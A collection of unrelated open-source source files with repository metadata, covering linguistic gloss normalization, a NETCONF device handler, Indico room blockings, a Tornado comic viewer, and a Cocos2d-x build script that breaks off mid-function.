}
if tags[0] in delims:
pattern = r'(\S*(?:\s*[{}]\s*\S*)+)'.format(delims[tags[0]])
text = item.text
toks = []
pos = 0
for match in list(re.finditer(pattern, text, re.U)):
start, end = match.span()
toks.append(text[pos:start])
toks.append(text[start:end].replace(' ', ''))
pos = end
toks.append(text[pos:len(text)])
item.text = ''.join(toks).rstrip()
# judgment extraction adapted from code from Ryan Georgi (PC)
# don't attempt for still-corrupted lines or those with alternations
# (detected by looking for '/' in the string)
def extract_judgment(item):
tags = get_tags(item)
if tags[0] == 'M' or 'CR' in tags:
return
match = re.match(r'^\s*([*?#]+)[^/]+$', item.text, re.U)
if match:
item.attributes['judgment'] = match.group(1)
        item.text = re.sub(r'^(\s*)[*?#]+\s*', r'\1', item.text, flags=re.U)
# BEWARE: regex magic below
# (?P<name>...) makes a named group
# (?P(name)abc|xyz) is conditional; if name matched, do abc, else xyz
basic_quoted_trans_re = re.compile(
r'(^|[[ (])'
'(?P<t>'
r'(?P<judg>[*?#]+)?'
r'((?P<cm>,,?)|(?P<oq>[{oq}]))' # if starting quote is , end might be `
r'(s\' \w|\'\w|{oq}\w|[\w,]{cq},? \w+ \w+|[^{cq}{oq}])+' # string content
r'((?(oq)([{cq}]|[^{oq}]*|\s*$)|(?(cm)[{cq}`]|[^{oq}]*)))' # end
')' # end t group
r'($|[ )\]])'
.format(oq=OPENQUOTES, cq=CLOSEQUOTES),
re.I|re.U
)
def separate_secondary_translations(items):
# sometimes translation lines with secondary translations are marked
# as +DB even if they are for the same, single IGT
for item in items:
tags = get_tags(item)
if tags[0] in ('L', 'G', 'L-G') and 'DB' in tags[1:]:
# don't attempt
return items
indent = min_indent(items, tags=('L','G','L-G','L-G-T','G-T'))
new_items = []
for item in items:
tags = get_tags(item)
text = item.text
if (tags[0] == 'T' and 'CR' not in tags[1:]):
text = re.sub(
r'([{cq}])\s*(\s|/)\s*([{oq}])'
                .format(oq=OPENQUOTES, cq=CLOSEQUOTES),
                r'\1 \2 \3', text, flags=re.I|re.U
)
matches = [m for m in basic_quoted_trans_re.finditer(text)
if m.group('t').strip()]
sub_items = []
if matches:
pos = 0
bare_T_seen = False
last_i = len(matches) - 1
for i, match in enumerate(matches):
start, end = match.start(), match.end()
t = match.group('t')
if i == last_i and re.search(r'\w|\d', text[end:], re.U):
t += text[match.end():]
pre = text[pos:match.start()]
# some instances have bad matches... try to avoid with
# a hard limit of 30 chars for the note or note is 2x
# size of t
prelen = len(pre.strip())
if prelen > 30 or prelen >= (2*len(t.strip())):
sub_items = []
new_items.append(item)
break
new_tags = list(tags)
if re.search(r'lit(?:eral(?:ly)?)?', pre):
if 'LT' not in new_tags: new_tags.append('LT')
elif (re.search(r'(or|also|ii+|\b[bcd]\.)[ :,]', pre)
or bare_T_seen):
if 'AL' not in new_tags: new_tags.append('AL')
else:
bare_T_seen = True
attrs = dict(item.attributes)
if match.group('judg'):
attrs['judgment'] = match.group('judg')
if re.search(r'\w|\d', pre, re.U):
attrs['note'] = pre.strip()
attrs['tag'] = '+'.join(new_tags)
sub_items.append(Item(
id=item.id + '_{}'.format(i+1),
attributes=attrs,
text=t
))
pos = end
new_items.extend(sub_items)
else:
new_items.append(item)
else:
new_items.append(item)
return new_items
# pre_trans_re = re.compile(
# '(?P<s>' # s comes before t
# r'\s*(?P<open>[(\[])?\s*'
# r'(?P<pre>(?: *(?:\w\'\w|[^{oq} (:,])*){{1,3}})(?P<delim>[:=.])?\s*?'
# ')' # end s group
# '(?P<t>'
# r'((?P<cm>(?:^| ),)|(?P<oq>[{oq}]))'
# r'(s\' \w|\'\w|," |[^{cq}{oq}])+'
# r'((?(oq)([{cq}]|[^{oq}]*|\s*$)|(?(cm)[{cq}`]|[^{oq}]*)))'
# r'|(?(delim)(?(open)[^)\]]+|[^(\[]+))' # unquoted translation?
# ')' # end t group
# .format(oq=OPENQUOTES, cq=CLOSEQUOTES),
# re.I|re.U
# )
# def separate_secondary_translations(items):
# # sometimes translation lines with secondary translations are marked
# # as +DB even if they are for the same, single IGT
# for item in items:
# tags = get_tags(item)
# if tags[0] in ('L', 'G', 'L-G') and 'DB' in tags[1:]:
# # don't attempt
# return items
# indent = min_indent(items, tags=('L','G','L-G','L-G-T','G-T'))
#
# new_items = []
# for item in items:
# tags = get_tags(item)
# text = item.text
# matches = [m for m in pre_trans_re.finditer(text)
# if m.group('pre').strip() or m.group('t').strip()]
# if (tags[0] == 'T' and 'CR' not in tags[1:]
# and (':' in text or basic_quoted_trans_re.search(text))
# and matches):
# # regrouping may be necessary for an over-eager regex
# parts = []
# for match in matches:
# pre = match.group('pre').strip()
# t = match.group('t').strip()
# if parts and pre and not t:
# parts[-1]['t'] = parts[-1]['t'] + match.group('s')
# else:
# parts.append({'pre': pre, 't': t})
# if len(parts) > 1:
# tags = [t for t in tags if t not in ('AL', 'LT', 'DB')]
# bare_T_seen = False
# for i, part in enumerate(parts):
# new_tags = list(tags)
# if re.search(r'lit(?:eral(?:ly)?)?', part['pre']):
# if 'LT' not in new_tags: new_tags.append('LT')
# elif (re.search(r'(or|also|ii+|\b[bcd]\.)[ :,]', part['pre'])
# or bare_T_seen):
# if 'AL' not in new_tags: new_tags.append('AL')
# else:
# bare_T_seen = True
# attrs = dict(item.attributes)
# if part['pre']:
# attrs['note'] = part['pre']
# attrs['tag'] = '+'.join(new_tags)
# new_items.append(Item(
# id=item.id + '_{}'.format(i),
# attributes=attrs,
# text=part['t']
# ))
# else:
# new_items.append(item)
# return new_items
def dewrap_lines(items):
# look for patterns like L G L G and join them to L G
# then look for T T and join them to T if they don't look like alternates
unwrapped = []
used = set()
sig = []
for item in items:
tags = get_tags(item)
if tags[0] in ('L', 'G', 'T'):
sig.append(item.attributes['tag'])
sig = ' '.join(sig)
if (any(x in sig for x in ('L G L G ', 'L G T L G T', 'G G ', 'L L '))
and not any(x in sig for x in ('L+', 'L-', 'G+', 'G-'))):
# likely patterns for wrapping without other noise
ls = [item for item in items if item.attributes.get('tag') == 'L']
gs = [item for item in items if item.attributes.get('tag') == 'G']
for l_, g_ in zip_longest(ls, gs):
if l_ is not None and g_ is not None:
maxlen = max([len(l_.text), len(g_.text)])
l_.text = l_.text.ljust(maxlen)
g_.text = g_.text.ljust(maxlen)
if ls:
merge_items(*ls)
unwrapped.append(ls[0])
if gs:
merge_items(*gs)
unwrapped.append(gs[0])
used.update(id(x) for x in ls + gs)
# add everything unused up to the first translation
for item in items:
if item.attributes.get('tag') in ('T', 'T+AC'):
break
elif id(item) not in used:
unwrapped.append(item)
used.add(id(item))
# now do translations
if (any(x in sig for x in ('L G T L G T', 'T T+AC', 'T T+LN', 'T T'))
and not any(x in sig for x in ('+EX', '+LT', '+AL', 'T+CR'))):
# translations that appear wrapped and not alternates
ts = [item for item in items
if item.attributes.get('tag') in ('T', 'T+AC', 'T+LN')]
if ts:
merge_items(*ts)
unwrapped.append(ts[0])
used.update(id(x) for x in ts)
# finally add anything unused
for item in items:
if id(item) not in used:
unwrapped.append(item)
used.add(id(item))
return unwrapped
def unquote_translations(items):
for item in items:
tags = get_tags(item)
if tags[0] == 'T':
item.text = re.sub(
                r'^\s*[{}]?'.format(OPENQUOTES), '', item.text, flags=re.U
)
item.text = re.sub(
                r'[{}]\s*$'.format(CLOSEQUOTES), '', item.text, flags=re.U
)
return items
## ============================================= ##
## For running as a script rather than a library ##
## ============================================= ##
def main(arglist=None):
parser = argparse.ArgumentParser(
formatter_class=argparse.RawDescriptionHelpFormatter,
description="Normalize ODIN 'clean' tiers",
epilog='examples:\n'
' odinnormalize.py by-doc-id/10.xml\n'
' cat 10-clean.xml | odinnormalize.py > 10-norm.xml'
)
parser.add_argument('-v', '--verbose',
action='count', dest='verbosity', default=2,
help='increase the verbosity (can be repeated: -vvv)'
)
parser.add_argument('infiles',
nargs='*',
help='the ODIN Xigt (XML) files to normalize'
)
args = parser.parse_args(arglist)
logging.basicConfig(level=50-(args.verbosity*10))
run(args)
def run(args):
if args.infiles:
for fn in args.infiles:
logging.info('Normalizing {}'.format(fn))
xc = xigtxml.load(fn, mode='full')
normalize_corpus(xc)
xigtxml.dump(fn, xc)
else:
xc = xigtxml.load(sys.stdin, mode='full')
normalize_corpus(xc)
print(xigtxml.dumps(xc))
if __name__ == '__main__':
main()
| {
"content_hash": "5e57307d31e2d9c7c5b766e7a68c45c9",
"timestamp": "",
"source": "github",
"line_count": 708,
"max_line_length": 119,
"avg_line_length": 37.559322033898304,
"alnum_prop": 0.5082731648616126,
"repo_name": "xigt/odin-utils",
"id": "81bbae90d0d0962c318de47c71f993b6f8c7fda3",
"size": "26615",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "odinnormalize.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "48073"
},
{
"name": "Shell",
"bytes": "10118"
}
],
"symlink_target": ""
} |
"""
Handler for Huawei device specific information through YANG.
Note that for proper import, the classname has to be:
"<Devicename>DeviceHandler"
...where <Devicename> is something like "Default", "Huawei", etc.
All device-specific handlers derive from the DefaultDeviceHandler, which implements the
generic information needed for interaction with a Netconf server.
"""
from ncclient.xml_ import BASE_NS_1_0
from .default import DefaultDeviceHandler
class HuaweiyangDeviceHandler(DefaultDeviceHandler):
"""
    Huawei handler for device-specific information.
In the device_params dictionary, which is passed to __init__, you can specify
the parameter "ssh_subsystem_name". That allows you to configure the preferred
SSH subsystem name that should be tried on your Huawei switch. If connecting with
that name fails, or you didn't specify that name, the other known subsystem names
will be tried. However, if you specify it then this name will be tried first.
"""
_EXEMPT_ERRORS = []
def __init__(self, device_params):
super(HuaweiyangDeviceHandler, self).__init__(device_params)
def get_capabilities(self):
# Just need to replace a single value in the default capabilities
c = []
c.append('urn:ietf:params:netconf:base:1.0')
c.append('urn:ietf:params:netconf:base:1.1')
return c
def get_xml_base_namespace_dict(self):
return {None: BASE_NS_1_0}
def get_xml_extra_prefix_kwargs(self):
d = {}
d.update(self.get_xml_base_namespace_dict())
return {"nsmap": d}
| {
"content_hash": "1d1d8a316fc3c9df8b10a91e40301205",
"timestamp": "",
"source": "github",
"line_count": 48,
"max_line_length": 87,
"avg_line_length": 33.5625,
"alnum_prop": 0.6964618249534451,
"repo_name": "earies/ncclient",
"id": "00569b1d1867aa8c3d1b4d3c99d2b0674c864a62",
"size": "1611",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "ncclient/devices/huaweiyang.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "194806"
}
],
"symlink_target": ""
} |
from google.cloud import datacatalog_v1beta1
async def sample_list_tags():
# Create a client
client = datacatalog_v1beta1.DataCatalogAsyncClient()
# Initialize request argument(s)
request = datacatalog_v1beta1.ListTagsRequest(
parent="parent_value",
)
# Make the request
    page_result = await client.list_tags(request=request)
# Handle the response
async for response in page_result:
print(response)
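# To run this coroutine outside an existing event loop (sketch; assumes Python
# 3.7+ and `import asyncio`): asyncio.run(sample_list_tags())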
# [END datacatalog_v1beta1_generated_DataCatalog_ListTags_async]
| {
"content_hash": "f3c03f89f047c75c1a76eeb9f9c67a02",
"timestamp": "",
"source": "github",
"line_count": 20,
"max_line_length": 64,
"avg_line_length": 25.75,
"alnum_prop": 0.7126213592233009,
"repo_name": "googleapis/python-datacatalog",
"id": "b1e4a2729fb4385e6926ee2c9e440ffd50a176c5",
"size": "1902",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "samples/generated_samples/datacatalog_v1beta1_generated_data_catalog_list_tags_async.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "2050"
},
{
"name": "Python",
"bytes": "3073442"
},
{
"name": "Shell",
"bytes": "30675"
}
],
"symlink_target": ""
} |
from __future__ import print_function, division, absolute_import
import logging
from tornado import gen
from .plugin import SchedulerPlugin
from ..core import connect, write, coerce_to_address
from ..worker import dumps_function
logger = logging.getLogger(__name__)
class EventStream(SchedulerPlugin):
""" Maintain a copy of worker events """
def __init__(self, scheduler=None):
self.buffer = []
if scheduler:
scheduler.add_plugin(self)
def transition(self, key, start, finish, *args, **kwargs):
if start == 'processing':
kwargs['key'] = key
if finish == 'memory' or finish == 'erred':
self.buffer.append(kwargs)
def swap_buffer(scheduler, es):
es.buffer, buffer = [], es.buffer
return buffer
def teardown(scheduler, es):
scheduler.remove_plugin(es)
@gen.coroutine
def eventstream(address, interval):
""" Open a TCP connection to scheduler, receive batched task messages
The messages coming back are lists of dicts. Each dict is of the following
form::
{'key': 'mykey', 'worker': 'host:port', 'status': status,
'compute_start': time(), 'compute_stop': time(),
'transfer_start': time(), 'transfer_stop': time(),
'disk_load_start': time(), 'disk_load_stop': time(),
'other': 'junk'}
Where ``status`` is either 'OK', or 'error'
Parameters
----------
address: address of scheduler
interval: time between batches, in seconds
Examples
--------
>>> stream = yield eventstream('127.0.0.1:8786', 0.100) # doctest: +SKIP
>>> print(yield read(stream)) # doctest: +SKIP
[{'key': 'x', 'status': 'OK', 'worker': '192.168.0.1:54684', ...},
{'key': 'y', 'status': 'error', 'worker': '192.168.0.1:54684', ...}]
"""
ip, port = coerce_to_address(address, out=tuple)
stream = yield connect(ip, port)
yield write(stream, {'op': 'feed',
'setup': dumps_function(EventStream),
'function': dumps_function(swap_buffer),
'interval': interval,
'teardown': dumps_function(teardown)})
raise gen.Return(stream)
| {
"content_hash": "bd2408bfc6749d75fa9499c5b0f110c2",
"timestamp": "",
"source": "github",
"line_count": 73,
"max_line_length": 79,
"avg_line_length": 30.465753424657535,
"alnum_prop": 0.5908273381294964,
"repo_name": "amosonn/distributed",
"id": "6b5677a22bdba1f9560e3c317eca5afa5c0ba44a",
"size": "2224",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "distributed/diagnostics/eventstream.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "HTML",
"bytes": "3228"
},
{
"name": "Python",
"bytes": "737968"
},
{
"name": "Shell",
"bytes": "901"
}
],
"symlink_target": ""
} |
from flask import jsonify, request, session
from webargs import fields
from werkzeug.exceptions import Forbidden
from indico.core.db import db
from indico.modules.rb.controllers import RHRoomBookingBase
from indico.modules.rb.models.blocked_rooms import BlockedRoom
from indico.modules.rb.models.blockings import Blocking
from indico.modules.rb.operations.blockings import create_blocking, get_room_blockings, update_blocking
from indico.modules.rb.schemas import blockings_schema
from indico.util.marshmallow import PrincipalList
from indico.web.args import use_args, use_kwargs
class RHCreateRoomBlocking(RHRoomBookingBase):
@use_args({
'room_ids': fields.List(fields.Int(), missing=[]),
'start_date': fields.Date(required=True),
'end_date': fields.Date(required=True),
'reason': fields.Str(required=True),
'allowed': PrincipalList(allow_groups=True, required=True),
})
def _process(self, args):
blocking = create_blocking(created_by=session.user, **args)
return jsonify(blockings_schema.dump(blocking, many=False))
class RHUpdateRoomBlocking(RHRoomBookingBase):
def _check_access(self):
RHRoomBookingBase._check_access(self)
if not self.blocking.can_edit(session.user):
raise Forbidden
def _process_args(self):
self.blocking = Blocking.get_or_404(request.view_args['blocking_id'])
@use_args({
'room_ids': fields.List(fields.Int(), required=True),
'reason': fields.Str(required=True),
'allowed': PrincipalList(allow_groups=True, required=True),
})
def _process(self, args):
update_blocking(self.blocking, **args)
return jsonify(blockings_schema.dump(self.blocking, many=False))
class RHRoomBlockings(RHRoomBookingBase):
@use_kwargs({
'timeframe': fields.Str(missing=None),
'my_rooms': fields.Bool(missing=False),
'mine': fields.Bool(missing=False)
}, location='query')
def _process(self, timeframe, my_rooms, mine):
filters = {'timeframe': timeframe, 'created_by': session.user if mine else None,
'in_rooms_owned_by': session.user if my_rooms else None}
blockings = get_room_blockings(**filters)
return jsonify(blockings_schema.dump(blockings))
class RHRoomBlockingBase(RHRoomBookingBase):
def _process_args(self):
self.blocking = Blocking.get_or_404(request.view_args['blocking_id'])
class RHRoomBlocking(RHRoomBlockingBase):
def _process(self):
return jsonify(blockings_schema.dump(self.blocking, many=False))
class RHBlockedRoomAction(RHRoomBlockingBase):
def _process_args(self):
RHRoomBlockingBase._process_args(self)
self.action = request.view_args['action']
self.blocked_room = (BlockedRoom.query
.with_parent(self.blocking)
.filter_by(room_id=request.view_args['room_id'])
.first_or_404())
def _check_access(self):
RHRoomBlockingBase._check_access(self)
if not self.blocked_room.room.can_manage(session.user):
raise Forbidden
def _process(self):
if self.action == 'accept':
self.blocked_room.approve()
elif self.action == 'reject':
self.reject()
return jsonify(blocking=blockings_schema.dump(self.blocking, many=False))
@use_kwargs({
'reason': fields.Str(required=True)
})
def reject(self, reason):
self.blocked_room.reject(session.user, reason)
class RHDeleteBlocking(RHRoomBlockingBase):
def _check_access(self):
RHRoomBlockingBase._check_access(self)
if not self.blocking.can_delete(session.user):
raise Forbidden
def _process(self):
db.session.delete(self.blocking)
return jsonify(blocking_id=self.blocking.id)
| {
"content_hash": "afa4f56471c869d8b93680631752b467",
"timestamp": "",
"source": "github",
"line_count": 106,
"max_line_length": 103,
"avg_line_length": 36.716981132075475,
"alnum_prop": 0.6700924974306269,
"repo_name": "ThiefMaster/indico",
"id": "b26bd5002a7f2d383cdf949d7b936a74edf50490",
"size": "4106",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "indico/modules/rb/controllers/backend/blockings.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "34704"
},
{
"name": "HTML",
"bytes": "1411006"
},
{
"name": "JavaScript",
"bytes": "2083786"
},
{
"name": "Mako",
"bytes": "1527"
},
{
"name": "Python",
"bytes": "5133951"
},
{
"name": "SCSS",
"bytes": "476568"
},
{
"name": "Shell",
"bytes": "3877"
},
{
"name": "TeX",
"bytes": "23327"
},
{
"name": "XSLT",
"bytes": "1504"
}
],
"symlink_target": ""
} |
"""Pylons environment configuration"""
import os
from mako.lookup import TemplateLookup
from genshi.template import TemplateLoader
from jinja2 import ChoiceLoader, Environment, FileSystemLoader
from pylons.configuration import PylonsConfig
from pylons.error import handle_mako_error
from sqlalchemy import engine_from_config
import projectname.lib.app_globals as app_globals
import projectname.lib.helpers
from projectname.config.routing import make_map
from projectname.model import init_model
def load_environment(global_conf, app_conf):
"""Configure the Pylons environment via the ``pylons.config``
object
"""
config = PylonsConfig()
# Pylons paths
root = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
paths = dict(root=root,
controllers=os.path.join(root, 'controllers'),
static_files=os.path.join(root, 'public'),
templates=[os.path.join(root, 'templates')])
# Initialize config with the basic options
config.init_app(global_conf, app_conf, package='projectname', paths=paths)
config['routes.map'] = make_map(config)
config['pylons.app_globals'] = app_globals.Globals(config)
config['pylons.h'] = projectname.lib.helpers
# Setup cache object as early as possible
import pylons
pylons.cache._push_object(config['pylons.app_globals'].cache)
# Create the Mako TemplateLookup, with the default auto-escaping
config['pylons.app_globals'].mako_lookup = TemplateLookup(
directories=paths['templates'],
error_handler=handle_mako_error,
module_directory=os.path.join(app_conf['cache_dir'], 'templates'),
input_encoding='utf-8', default_filters=['escape'],
imports=['from webhelpers.html import escape'])
# Create the Genshi TemplateLoader
config['pylons.app_globals'].genshi_loader = TemplateLoader(
paths['templates'], auto_reload=True)
# Create the Jinja2 Environment
config['pylons.app_globals'].jinja2_env = Environment(loader=ChoiceLoader(
[FileSystemLoader(path) for path in paths['templates']]))
# CONFIGURATION OPTIONS HERE (note: all config options will override
# any Pylons config options)
engine = engine_from_config(config, 'sqlalchemy.')
init_model(engine)
return config
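# Typical call site (assumption, based on the standard Pylons 1.x project
# layout): config/middleware.py builds the WSGI app with
#     config = load_environment(global_conf, app_conf)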
| {
"content_hash": "6f70455b9e65b36d33bb1813eea8cfdd",
"timestamp": "",
"source": "github",
"line_count": 63,
"max_line_length": 78,
"avg_line_length": 37.15873015873016,
"alnum_prop": 0.7035454933788979,
"repo_name": "Pylons/pylons",
"id": "9a6dccac79d85ce31ee58d5abe1ada8cdfbe8863",
"size": "2341",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "tests/test_webapps/filestotest/environment_def_sqlamodel.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "29990"
},
{
"name": "HTML",
"bytes": "13435"
},
{
"name": "JavaScript",
"bytes": "4066"
},
{
"name": "Makefile",
"bytes": "2195"
},
{
"name": "Python",
"bytes": "400516"
}
],
"symlink_target": ""
} |
import tornado.web as web
import tornado.template as template
import tornado.ioloop as ioloop
import os,sys,mimetypes
import rarfile,zipfile
supported_archive = [".zip", ".rar"]
supported_image = [".jpe", ".jpg", ".jpeg", ".gif", ".png"]
work_dir = os.getcwd()
list_template = template.Template(
"""<html>
<head>
<title>PyComicCast</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
</head>
<body>
<ul>
{% for i in names %}
<li> <a href="/{{ i[0] }}/0">{{ escape(i[1]) }}</a> </li>
{% end %}
</ul>
</body>
</html>"""
)
image_template = template.Template(
"""<html>
<head>
<title>PyComicCast</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<style type="text/css">
img.content {max-width:100%;}
div.content {text-align:center;}
div.navi {text-align:center;}
</style>
</head>
<body>
<div class="content">
<a href="/{{archive}}/{{image + 1}}"><img class="content" src="/{{archive}}/{{image}}/image"/></a>
</div>
<br />
<br />
<div class="navi">
<a href="/{{archive}}/{{image - 1}}">Previous</a>
<a href="/">Return</a>
<a href="/{{archive}}/{{image + 1}}">Next</a>
</div>
</body>
</html>"""
)
file_objs = {}
def get_file_list():
return [i for i in os.listdir(work_dir) if os.path.splitext(i)[1].lower() in supported_archive]
def get_file_obj(index):
name = get_file_list()[index]
if not name in file_objs:
if name.endswith(".rar"):
obj = rarfile.RarFile(os.path.join(work_dir, name))
elif name.endswith(".zip"):
obj = zipfile.ZipFile(os.path.join(work_dir, name))
else:
raise Exception, "Not supported archive file!"
img_list = [i for i in obj.namelist() if os.path.splitext(i)[1].lower() in supported_image]
img_list.sort()
file_objs[name] = (obj, img_list)
return file_objs[name]
class RootHandler(web.RequestHandler):
def get(self):
self.write(list_template.generate(names=enumerate(get_file_list())))
class ImagePageHandler(web.RequestHandler):
def get(self, archive, image):
image = int(image)
archive = int(archive)
max_index = len(get_file_obj(archive)[1])
if image < 0 or image >= max_index:
self.redirect("/")
return
self.write(image_template.generate(archive=archive,image=image))
class ImageHandler(web.RequestHandler):
def get(self, archive, image):
image = int(image)
archive = int(archive)
obj = get_file_obj(archive)
mimetype = mimetypes.guess_type(obj[1][image])
img = obj[0].open(obj[1][image])
self.set_header("Content-Type", mimetype[0])
while True:
data = img.read(2048)
if not data:
break
self.write(data)
application = web.Application([
(r"/", RootHandler),
(r"/(\d+)/(-?\d+)", ImagePageHandler),
(r"/(\d+)/(-?\d+)/image", ImageHandler)
])
if __name__=="__main__":
if len(sys.argv) >= 2:
work_dir = sys.argv[1]
application.listen(8888)
try:
ioloop.IOLoop.instance().start()
except KeyboardInterrupt:
print "Exiting..."
| {
"content_hash": "0acc15c4b4ecd04312db8e4adfdec374",
"timestamp": "",
"source": "github",
"line_count": 119,
"max_line_length": 106,
"avg_line_length": 28.3781512605042,
"alnum_prop": 0.558187740598164,
"repo_name": "chaserhkj/PyComicCast",
"id": "b4714ca463f46e6e705c038ef2bd9ae0decb2152",
"size": "3515",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "ComicCast.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "3515"
}
],
"symlink_target": ""
} |
from unittest import mock
import octavia # noqa H306
from octavia.common import constants
from octavia.controller.worker.v2.tasks import notification_tasks
import octavia.tests.unit.base as base
class MockNOTIFIER(mock.MagicMock):
info = mock.MagicMock()
@mock.patch('octavia.common.rpc.NOTIFIER',
new_callable=MockNOTIFIER)
@mock.patch('octavia.common.context.Context', new_callable=mock.MagicMock)
@mock.patch('octavia.api.v2.types.load_balancer.LoadBalancerFullResponse.'
'from_data_model',
new_callable=mock.MagicMock)
class TestNotificationTasks(base.TestCase):
def test_update_notification_execute(self, *args):
noti = notification_tasks.SendUpdateNotification()
id = 1
lb = {constants.PROJECT_ID: id,
constants.LOADBALANCER_ID: id}
noti.execute(lb)
octavia.common.context.Context.assert_called_with(project_id=id)
call_args, call_kwargs = octavia.common.rpc.NOTIFIER.info.call_args
self.assertEqual('octavia.loadbalancer.update.end', call_args[1])
def test_create_notification(self, *args):
noti = notification_tasks.SendCreateNotification()
id = 2
lb = {constants.PROJECT_ID: id,
constants.LOADBALANCER_ID: id}
noti.execute(lb)
octavia.common.context.Context.assert_called_with(project_id=id)
call_args, call_kwargs = octavia.common.rpc.NOTIFIER.info.call_args
self.assertEqual('octavia.loadbalancer.create.end', call_args[1])
def test_delete_notification(self, *args):
noti = notification_tasks.SendDeleteNotification()
id = 3
lb = {constants.PROJECT_ID: id,
constants.LOADBALANCER_ID: id}
noti.execute(lb)
octavia.common.context.Context.assert_called_with(project_id=id)
call_args, call_kwargs = octavia.common.rpc.NOTIFIER.info.call_args
self.assertEqual('octavia.loadbalancer.delete.end', call_args[1])
| {
"content_hash": "9baabe34fc3626f2b738b4fd3b876c19",
"timestamp": "",
"source": "github",
"line_count": 47,
"max_line_length": 75,
"avg_line_length": 42.191489361702125,
"alnum_prop": 0.6898638426626323,
"repo_name": "openstack/octavia",
"id": "e336ced359f9a84f3a8d1deab2baf78463eb26eb",
"size": "2526",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "octavia/tests/unit/controller/worker/v2/tasks/test_notification_tasks.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Jinja",
"bytes": "60600"
},
{
"name": "Mako",
"bytes": "922"
},
{
"name": "Python",
"bytes": "6651664"
},
{
"name": "Ruby",
"bytes": "531"
},
{
"name": "Shell",
"bytes": "117966"
}
],
"symlink_target": ""
} |
from JumpScale import j
import JumpScale.grid.zdaemon
j.application.start("zdaemon")
j.logger.consoleloglevel = 2
j.core.zdaemon.initSSL4Server("myorg", "servertest")
j.application.stop()
| {
"content_hash": "1fbcd6c3446c069032e691488fb0fe9d",
"timestamp": "",
"source": "github",
"line_count": 11,
"max_line_length": 52,
"avg_line_length": 17.545454545454547,
"alnum_prop": 0.7772020725388601,
"repo_name": "Jumpscale/jumpscale6_core",
"id": "d3fa945a60b45870d42e9907895414a3db55698e",
"size": "194",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "examples/zdaemon/zdaemon_ssl_init.py",
"mode": "33261",
"license": "bsd-2-clause",
"language": [
{
"name": "CSS",
"bytes": "3681"
},
{
"name": "HTML",
"bytes": "11738"
},
{
"name": "JavaScript",
"bytes": "70132"
},
{
"name": "Lua",
"bytes": "2162"
},
{
"name": "Python",
"bytes": "5848017"
},
{
"name": "Shell",
"bytes": "7692"
}
],
"symlink_target": ""
} |
from setuptools import setup
VERSION = '0.2.1'
install_reqs = [
'elasticsearch-dsl',
'requests',
'pandas'
]
setup(
name='sharepa',
packages=['sharepa'],
version=VERSION,
description='A library for browsing and analyzing SHARE data',
author='Fabian von Feilitzsch',
author_email='[email protected]',
url='https://github.com/fabianvf/sharepa',
download_url='https://github.com/fabianvf/sharepa/tarball/{}'.format(VERSION),
install_requires=install_reqs
)
| {
"content_hash": "7bd520bdcbbaa241fe05a0a3879b54d1",
"timestamp": "",
"source": "github",
"line_count": 20,
"max_line_length": 82,
"avg_line_length": 24.95,
"alnum_prop": 0.6753507014028056,
"repo_name": "erinspace/sharepa",
"id": "cd13743879c12cb8c6b51a22d299f8f080268084",
"size": "499",
"binary": false,
"copies": "2",
"ref": "refs/heads/develop",
"path": "setup.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "5997"
}
],
"symlink_target": ""
} |
import sys
import os, os.path
import shutil
import ConfigParser
import subprocess
import re
from contextlib import contextmanager
def _check_ndk_root_env():
''' Checking the environment NDK_ROOT, which will be used for building
'''
try:
NDK_ROOT = os.environ['NDK_ROOT']
except Exception:
print "NDK_ROOT not defined. Please define NDK_ROOT in your environment."
sys.exit(1)
return NDK_ROOT
def _check_python_bin_env():
''' Checking the environment PYTHON_BIN, which will be used for building
'''
try:
PYTHON_BIN = os.environ['PYTHON_BIN']
except Exception:
print "PYTHON_BIN not defined, use current python."
PYTHON_BIN = sys.executable
return PYTHON_BIN
class CmdError(Exception):
pass
@contextmanager
def _pushd(newDir):
previousDir = os.getcwd()
os.chdir(newDir)
yield
os.chdir(previousDir)
def _run_cmd(command):
ret = subprocess.call(command, shell=True)
if ret != 0:
message = "Error running command"
raise CmdError(message)
def main():
cur_platform= '??'
llvm_path = '??'
ndk_root = _check_ndk_root_env()
# del the " in the path
ndk_root = re.sub(r"\"", "", ndk_root)
python_bin = _check_python_bin_env()
platform = sys.platform
if platform == 'win32':
cur_platform = 'windows'
elif platform == 'darwin':
cur_platform = platform
elif 'linux' in platform:
cur_platform = 'linux'
else:
print 'Your platform is not supported!'
sys.exit(1)
if platform == 'win32':
x86_llvm_path = os.path.abspath(os.path.join(ndk_root, 'toolchains/llvm-3.3/prebuilt', '%s' % cur_platform))
if not os.path.exists(x86_llvm_path):
x86_llvm_path = os.path.abspath(os.path.join(ndk_root, 'toolchains/llvm-3.4/prebuilt', '%s' % cur_platform))
else:
x86_llvm_path = os.path.abspath(os.path.join(ndk_root, 'toolchains/llvm-3.3/prebuilt', '%s-%s' % (cur_platform, 'x86')))
if not os.path.exists(x86_llvm_path):
x86_llvm_path = os.path.abspath(os.path.join(ndk_root, 'toolchains/llvm-3.4/prebuilt', '%s-%s' % (cur_platform, 'x86')))
x64_llvm_path = os.path.abspath(os.path.join(ndk_root, 'toolchains/llvm-3.3/prebuilt', '%s-%s' % (cur_platform, 'x86_64')))
if not os.path.exists(x64_llvm_path):
